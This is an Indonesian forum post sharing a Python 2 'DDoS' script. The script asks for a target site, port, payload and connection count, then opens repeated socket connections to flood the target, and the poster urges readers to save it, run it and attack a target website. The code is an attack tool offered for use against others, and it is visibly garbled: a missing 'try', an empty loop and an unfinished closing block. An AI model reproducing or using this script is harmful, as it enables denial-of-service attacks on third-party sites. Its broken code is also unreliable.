Script Ddos Phyton

 oke lama gak muncul karena ada masalah internet yang coid Ngakak

langsung saja di comot ini scriptnya gan


#|Creators :          |
#|-Th3 Hut3r 404 Ddos Attacker  |
#|-Rebel Yell         |


import time
import socket
import os
import sys
import string


def restart_program():
    python = sys.executable
    os.execl(python, python, * sys.argv)
curdir = os.getcwd()


print ("DDoS mode loaded")
host=raw_input( "Site you want to DDoS:" )
port=input( "Port you want to attack:" )
message=raw_input( "Input the message you want to send:" )
conn=input( "How many connections you want to make:" )
ip = socket.gethostbyname( host )
print ("[" + ip + "]")
print ( "[Ip is locked]" )
print ( "[Attacking " + host + "]" )
print ("+----------------------------+")
def dos():
    #pid = os.fork()
    ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ddos.connect((host, 80))
        ddos.send( message )
        ddos.sendto( message, (ip, port) )
        ddos.send( message );
    except socket.error, msg:
        print("|[Connection Failed]         |")
    print ( "|[DDoS Attack Engaged]       |")
for i in range(1, conn):
print ("+----------------------------+")
print("The connections you requested had finished")
if __name__ == "__main__":
    answer = raw_input("Do you want to ddos more?")
    if answer.strip() in "y Y yes Yes YES".split():

simpan file dengan extension .py Big Grin
dan pastikan os udah terinstall python Ngakak2

kalau udah ada tinggal jalankan dengan petintah


dan hajar si web target dengan ddos ini gan haha

